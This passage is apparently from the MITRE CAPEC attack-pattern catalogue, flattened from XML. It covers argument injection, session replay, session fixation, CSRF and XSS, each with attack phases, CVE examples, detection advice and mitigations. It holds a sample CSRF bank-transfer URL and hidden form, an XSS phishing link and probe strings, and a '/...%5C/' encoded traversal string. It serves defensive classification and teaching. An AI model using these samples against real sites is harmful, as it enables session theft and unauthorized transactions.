and non-filtered arguments of exposed services or methods. Discovery of potential injection vectors Using an automated tool or manual discovery, the attacker identifies services or methods with arguments that could potentially be used as injection vectors (OS, API, SQL procedures, etc.). Manually cover the application and record the possible places where arguments could be passed into external systems. env-All Use a spider, for web applications, to create a list of URLs and associated inputs. env-All Arguments are used by the application in exposed services or methods env-All No parameters appear to be used. env-All Application does not use any inputs. env-All A list of parameters, arguments to modify is identified. A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. 1. Attempt variations on argument content Possibly using an automated tool, the attacker will perform injection variations of the arguments. Use a very large list of probe strings in order to detect if there is a positive result, and, what type of system has been targeted (if obscure). env-All Use a proxy tool to record results, error messages and/or log if accessible. env-All The application behaves like the injection has been a success. env-All No result appears. env-All It is possible to monitor the application and to see that the argument has been validated. Actively monitor malicious inputs. Monitor the services and/or methods uses of the arguments. Abuse of the application The attacker injects specific syntax into a particular argument in order to generate a specific malicious effect in the targeted application. Manually inject specific payload into targeted argument. env-All The attacker observes desired effect. Actively monitor malicious inputs. Monitor the services and/or methods uses of the arguments. Target software fails to strip all user-supplied input of any content that could cause the shell to perform unexpected actions. Software must allow for unvalidated or unfiltered input to be executed on operating system shell, and, optionally, the system configuration must allow for output to be sent back to client. High High Injection A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. [R.6.2] Medium The attacker has to identify injection vector, identify the operating system-specific commands, and optionally collect the output. Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP. Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process. Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred. Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise. Confidentiality Access_Control Authorization Gain privileges / assume identity Integrity Modify application data Confidentiality Read application data Malicious input delivered through standard input, the attacker inserts additional arguments on the application's standard interface Varies with instantiation of attack pattern. Malicious payload either pass commands through valid parameters or supply metacharacters that cause unexpected termination that redirects to shell Client machine and client network (e.g. Intranet) Enables attacker to execute server side code with any commands that the program owner has privileges to, this is particularly problematic when the program is run as a system or privileged account. 77 Targeted 146 Targeted 184 Targeted 78 Targeted 185 Targeted 713 Targeted 697 Targeted 1000 Attack Pattern ChildOf 137 Never Use Input as Part of a Directive to any Internal Component Penetration Low High Low All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Jouko Pynnonen Java Web Start argument injection vulnerability http://www.securityfocus.com/archive/1/393696 [R.6.1][REF-2] Cigital, Inc 2007-01-01 [R.6.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Prerequisites and Related Guidelines Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Prerequisites and Related Guidelines Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Activation_Zone, Attack_Phases, Payload, Payload_Activation_Impact, Solutions_and_Mitigations This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay. The attacker interacts with the target host and finds that session IDs are used to authenticate users. The attacker steals a session ID from a valid user. The attacker tries to use the stolen session ID to gain access to the system with the privileges of the session ID's original owner. The target host uses session IDs to keep track of the users. Session IDs are used to control access to resources. The session IDs used by the target host are not well protected from session theft. High High Spoofing Social Engineering Analysis OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls. CVE-1999-0428 Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user's answer or forward URLs. CVE-2002-0258 Low If an attacker can steal a valid session ID, he can then try to be authenticated with that stolen session ID. Medium More sophisticated attack can be used to hijack a valid session from a user and spoof a legitimate user by reusing his valid session ID. The attacker can listen to a conversation between the client and server and steal a valid session ID. The attacker can try to steal session information from the user's cookies. The attacker can try a valid session from a finished transaction and find out that the transaction associated with the session ID did not time out. Always invalidate a session ID after the user logout. Setup a session time out for the session IDs. Protect the communication between the client and server. For instance it is best practice to use SSL to mitigate man in the middle attack. Do not code send session ID with GET method, otherwise the session ID will be copied to the URL. In general avoid writing session IDs in the URLs. URLs can get logged in log files, which are vulnerable to an attacker. Encrypt the session data associated with the session ID. Use multifactor authentication. Confidentiality Access_Control Authorization Gain privileges / assume identity 294 Targeted 290 Targeted 346 Targeted 384 Targeted 488 Secondary 539 Secondary 200 Secondary 285 Secondary 664 Targeted 732 Targeted 1000 Attack Pattern ChildOf 21 Securing the Weakest Link Penetration High High Low Client-Server J2EE .NET All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Eric Dalci Cigital, Inc 2007-01-25 Eric Dalci Cigital, Inc 2007-01-25 Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Skill_or_Knowledge_Type Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Probing_Techniques The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation. Setup the Attack Setup a session: The attacker has to setup a trap session that provides a valid session identifier, or select an arbitrary identifier, depending on the mechanism employed by the application. A trap session is a dummy session established with the application by the attacker and is used solely for the purpose of obtaining valid session identifiers. The attacker may also be required to periodically refresh the trap session in order to obtain valid session identifiers. The attacker chooses a predefined identifier that he knows. env-Web env-Peer2Peer env-CommProtocol env-ClientServer The attacker creates a trap session for the victim. env-Web env-Peer2Peer env-CommProtocol env-ClientServer The application accepts predefined, or user-provided session IDs env-Web env-Peer2Peer env-CommProtocol env-ClientServer The application ignores predefined, or user-provided session IDs and provides new session IDs. env-Web env-Peer2Peer env-CommProtocol env-ClientServer A trap session or a predefined session ID is established. Detect and alert on users who provide unknown session IDs in their connection establishment. Since this also fits the scenario where a user's session has expired, the heuristic must be a bit smarter, perhaps looking for an unusually high number of such occurrences in a short time frame. Detect and alert on multiple origins connecting with the same predefined session ID. Attract a Victim Fixate the session: The attacker now needs to transfer the session identifier from the trap session to the victim by introducing the session identifier into the victim's browser. This is known as fixating the session. The session identifier can be introduced into the victim's browser by leveraging cross site scripting vulnerability, using META tags or setting HTTP response headers in a variety of ways. Attackers can put links on web sites (such as forums, blogs, or comment forms). env-Web Attackers can establish rogue proxy servers for network protocols that give out the session ID and then redirect the connection to the legitimate service. env-Peer2Peer env-ClientServer env-CommProtocol Attackers can email attack URLs to potential victims through spam and phishing techniques. env-Web A victim makes a connection according to the attackers' design. Record referrers from web clients that connect with predefined session IDs. Alert when referrers do not match known, acceptable sites. Abuse the Victim's Session Takeover the fixated session: Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the fixated session identifier. The attacker loads the predefined session ID into his browser and browses to protected data or functionality. env-Web The attacker loads the predefined session ID into his software and utilizes functionality with the rights of the victim. env-CommProtocol env-ClientServer env-Peer2Peer The attacker gains access to data or functionality with the rights of the victim. Detect and alert on multiple simultaneous uses of the same session ID from different origins. Disconnect all simultaneous users of the same session ID when they arrive from different origins. Session identifiers that remain unchanged when the privilege levels change. Permissive session management mechanism that accepts random user-generated session identifiers Predictable session identifiers High Medium Time and State Injection Consider a banking application that issues a session identifier in the URL to a user before login, and uses the same identifier to identify the customer following successful authentication. An attacker can easily leverage session fixation to access a victim's account by having the victim click on a forged link that contains a valid session identifier from a trapped session setup by the attacker. Once the victim is authenticated, the attacker can take over the session and continue with the same levels of privilege as the victim. An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user's browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels. CVE-2004-2182 Low Only basic skills are required to determine and fixate session identifiers in a user's browser. Subsequent attacks may require greater skill levels depending on the attackers' motives. None Determining whether the target application server accepts preset session identifiers is relatively easy. The attacker may try setting session identifiers in the URL or hidden form fields or in cookies, depending upon application design. Having access to an account or by utilizing a dummy account, the attacker can determine whether the preset session identifiers are accepted or not. With code or design in hand, the attacker can readily verify whether preset session identifiers are accepted and whether identifiers are regenerated, and possible destroyed, when privilege levels change. There are no indicators for the server since a fixated session identifier is similar to an ordinarily generated one. However, too many invalid sessions due to invalid session identifiers is a potential warning. A client can be suspicious if a received link contains preset session identifiers. However, this depends on the client's knowledge of such an issue. Also, fixation through Cross Site Scripting or hidden form fields is usually difficult to detect. Use a strict session management mechanism that only accepts locally generated session identifiers: This prevents attackers from fixating session identifiers of their own choice. Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes. Use session identifiers that are difficult to guess or brute-force: One way for the attackers to obtain valid session identifiers is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult. Confidentiality Access_Control Authorization Gain privileges / assume identity GET or POST data, Hidden form fields and session cookies Preset session identifier Target application's session management mechanism The payload activation impact is that a session identifier of the attackers' choice is considered valid and trust decisions by the application will be based on such a fixated identifier. 384 Targeted 361 Secondary 664 Targeted 732 Targeted 1000 Attack Pattern ChildOf 21 333 Category HasMember 370 Regenerate session identifiers upon each new request. This ensures that fixated session identifiers are rendered obsolete. Regenerate a session identifier every time a user enters an authenticated session and destroy the identifier when the user logs out of an authenticated session. Set appropriate expiry times on cookies that contain session identifiers. This helps limit the window of opportunity for an attacker to use the identifier. Do not use session identifiers as part of URLs or hidden form fields. It becomes easy for an attacker to trick a user into a fixated session when session identifiers are easily accessible. Authenticate every transaction by requesting credentials. This ensures that only a legitimate user of the application can proceed with the transaction. If an attacker seeks to perform any such authenticated transaction, valid credentials will be required even though session fixation may have been successful earlier. Complete Mediation Reluctance to Trust Defense in Depth Never Use Unvalidated Input as Part of a Directive to any Internal Component Penetration High High Low Client-Server J2EE .NET All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-384 - Session Fixation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/384.html Common Weakness Enumeration (CWE) CWE-361 - Time and State Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/361.html Chiradeep B Chhaya 2007-01-29 Second Draft Chiradeep B Chhaya 2007-01-29 Second Draft Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Payload_Activation_Impact An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply "riding" the existing session cookie. Explore target website The attacker first explores the target website to determine pieces of functionality that are of interest to him (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts. Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server env-Web Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server env-Web View HTML source of web pages that contain links or buttons that perform actions of interest. env-Web Attacker identifies at least one piece of interesting functionality that can be executed by making a single HTTP GET or POST request containing no session-specific parameters. Attacker cannot identify any functionality that can be executed without sending a session-specific parameter other than the cookie in the HTTP request. Create a link that when clicked on, will execute the interesting functionality. The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc. Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000) env-Web Create a form that will submit a POST request (e.g. <form method="POST" action="https://www.somebank.com/members/transfer.asp"><input type="hidden" Name="to" value="012345678901"/><input type="hidden" Name="amt" value="10000"/><input type="submit" src="clickhere.jpg"/></form> env-Web Success outcome in previous step. env-Web Failure outcome in previous step. env-Web A link that performs an operation that the attacker desires when it is clicked. Creating a link that performs an operation that the attacker desires when it is clicked, is impossible, because the site has implemented protections against CSRF. Include a unique HTTP parameter value in forms every time they are sent to the client. Verify that the expected value is in the response received from the client. In this case, the attacker will not have access to the correct parameter value for another user, and thus, will not be able to create forged requests. Check HTTP referrer for each request to ensure that it is from the expected site. Note that if the site is vulnerable to XSS, then the attacker will be able to bypass this. Convince user to click on link Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack. Execute a phishing attack and send the user an e-mail convincing him to click on a link. env-Web Execute a stored XSS attack on a website to permanently embed the malicious link into the website. env-Web Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link. env-Web Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site. env-Web Success outcome in previous step. env-Web Failure outcome in previous step. env-Web A user executes the malicious link crafted by the attacker. Failure outcome in previous step. Monitor server logs for referrers. If users are being tricked into clicking CSRF links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Deny requests and invalidate session IDs for requests that contain unexpected referrers. Note that this will not protect against cases where the target website is also vulnerable to cross site scripting. Very High High Spoofing Analysis While a user is logged into his bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email. The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account. The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie. Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail. Medium The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes. All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim. The attacker can observe the way the application accepts requests for actions. If the application uses a persistent cookie, a non-random identifier or any such static identification token that does not change with every request, the attack is fairly straightforward to accomplish In order to obfuscate the actual URL and its contents passed to the victim, the attacker can employ a service such as TinyURL and optionally redirect the request to the actual malicious script Use cryptographic tokens to associate a request with a specific action. The token can be regenerated at every request so that if a request with an invalid token is encountered, it can be reliably discarded. The token is considered invalid if it arrived with a request other than the action it was supposed to be associated with. Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context. Additionally, the user can also be prompted to confirm an action every time an action concerning potentially sensitive data is invoked. This way, even if the attacker manages to get the user to click on a malicious link and request the desired action, the user has a chance to recover by denying confirmation. This solution is also implicitly tied to using a second factor of authentication before performing such actions. In general, every request must be checked for the appropriate authentication token as well as authorization in the current session context. Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Read application data Integrity Modify application data 352 Targeted 306 Secondary 664 Targeted 732 Targeted 716 Targeted 1000 Attack Pattern ChildOf 21 333 Category HasMember 342 Complete Mediation Defense In Depth Use Authorization Mechanisms Correctly Use Authentication Mechanisms, Where Appropriate, Correctly Exploitation High High Low Client-Server J2EE .NET All All Thomas Schreiber Session Riding: A Widespread Vulnerability in Today's Web Applications SecureNet GmbH Dec 2004 http://www.securenet.de/papers/Session_Riding.pdf Chiradeep B.Chhaya Cigital, Inc 2007-02-27 Chiradeep B.Chhaya Cigital, Inc 2007-02-27 Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances, Solutions_and_Mitigations An attacker embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. Further, these attacks are very difficult for an end user to detect. Survey the application for user-controllable inputs Using a browser or an automated tool, an attacker follows all public links and actions on a web site. He records all the links, the forms, the resources accessed and all other potential entry-points for the web application. Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL. env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery. env-Web Inputs are used by the application or the browser (DOM) env-Web Using URL rewriting, parameters may be part of the URL path. env-Web No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker. A list of application user interface entry fields is created by the attacker. A list of resources accessed by the application is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Probe identified potential entry points for XSS vulnerability The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier. env-Web Use a proxy tool to record results of manual input of XSS probes in known URLs. env-Web Use a list of XSS probe strings to inject script into UI entry fields. If possible, the probe strings contain a unique identifier. env-Web Use a list of XSS probe strings to inject script into resources accessed by the application. If possible, the probe strings contain a unique identifier. env-Web The output of pages includes some form of a URL parameter. e.g., ?error="<foobar>'(){};=" becomes "<foobar>'(){}=" in the title of the web page. env-Web Input content becomes part of the web page. env-Web Nothing is returned to the web page. It may be a stored XSS. The unique identifier from the probe helps to trace the flow of the possible XSS. env-Web The attacker's cross-site scripting string is repeated back verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, script, etc.) All HTML-sensitive characters are consistently re-encoded before being sent to the web browser. Some sensitive characters are consistently encoded, but others are not. Monitor input to web servers (not only GET, but all potential inputs), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that hackers use. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Steal session IDs, credentials, page content, etc. As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker. env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately. env-Web The attacker gets the user's cookies or other session identifiers. The attacker gets the content of the page the user is viewing. The attacker causes the user's browser to visit a page with malicious content. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Forceful browsing When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not). Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities). env-Web The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF. The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Content spoofing By manipulating the content, the attacker targets the information that the user would like to get from the website. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page. env-Web The user sees a page containing wrong information Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Target client software must be a client that allows scripting communication from remote hosts, such as a JavaScript-enabled Web Browser Very High High Injection Modification of Resources Protocol Manipulation Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this <a href="www.exampletrustedsite.com?Name=<script>maliciousscript</script>">Trusted Site</a> When the user clicks the link, the appended script also executes on the local user's machine. Low To achieve a redirection and use of less trusted source, an attacker can simply place a script in bulletin board, blog, wiki, or other user-generated content site that are echoed back to other client machines. High Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process. Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine Design: Use browser technologies that do not allow client side scripting. Design: Utilize strict type, character, and encoding enforcement Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from. Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification. Implementation: Perform input validation for all remote content. Implementation: Perform output validation for all remote content. Implementation: Session tokens for specific host Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Integrity Modify application data Confidentiality Read application data Malicious input delivered through standard content (containing scripts) that is sent to the user's machine, for example HTML page containing JavaScript. Varies with instantiation of attack pattern. Malicious script payload may be appended to end of legitimate looking link Client browser, its component libraries, and client network (e.g. Intranet) Enables attacker to execute scripts to launch attacks on remote client machine and environment. Intranet and local systems may not be patched to the same degree as "externally" facing systems, so simple attacks may identify more victims on an "internal" system such as a corporate Intranet 79 Targeted 20 Targeted 184 Secondary 96 Targeted 113 Targeted 348 Targeted 116 Targeted 350 Targeted 86 Secondary 602 Targeted 692 Targeted 697 Targeted 713 Targeted 71 Targeted 1000 Attack Pattern ChildOf 242 333 Category HasMember 341 Penetration Exploitation High High High Client-Server J2EE .NET All JSP Java ASP.NET ASP PHP AJAX G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.63.1][REF-2] Cigital, Inc 2007-01-01 [R.63.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Injection_Vector This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The attacker accesses the server using a specific URL. The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly. The attacker crafts a malicious URL string request and sends it to the server. The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences. The application accepts and decodes URL string request. The application performs insufficient filtering/canonicalization on the URLs. High High Injection Protocol Manipulation API Abuse Attack Example: Combined Encodings CesarFTP Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks. An attacker could provide a URL that included a string like /...%5C/ This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot. CVE-2001-1335 Low An attacker can try special characters in the URL and bypass the URL validation. Medium The attacker may write a script to defeat the input filtering mechanism. An attacker can manually inject special characters in the URL string request and observe the results of the request. Custom scripts can also be used. For example, a good script for verifying the correct interpretation of UTF-8 encoded characters can be found at http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt Automated tools such as fuzzer can be used to test the URL decoding and filtering. If the first decoding process has left some invalid or blacklisted characters, that may be a sign that the request is malicious. Traffic filtering with IDS (or proxy) can detect requests with suspicious URLs. IDS may use signature based identification to reveal such 